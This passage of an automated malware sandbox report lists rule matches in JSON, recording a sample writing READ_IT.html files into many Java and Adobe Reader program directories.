(x86)\\Java\\jre7\\lib\\zi\\Etc\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6783", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6901", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6951", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_6993", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_7323", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_7365", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_7795", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_7809", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_7819", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_7853", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_7903", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\security\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8109", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\security\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\management\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8145", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\management\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\jfr\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\jfr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8163", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\jfr\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\images\\cursors\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8173", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\images\\cursors\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\i386\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\i386\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8207", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\i386\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8213", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\fonts\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\ext\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8247", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\ext\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8289", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\deploy\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\jqs\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8347", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\deploy\\jqs\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8357", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\lib\\cmm\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\client\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8471", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\java\\jre7\\bin\\client\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8482", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8619", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8635", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8641", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8699", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8777", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8804", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8810", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_8816", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9418", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", 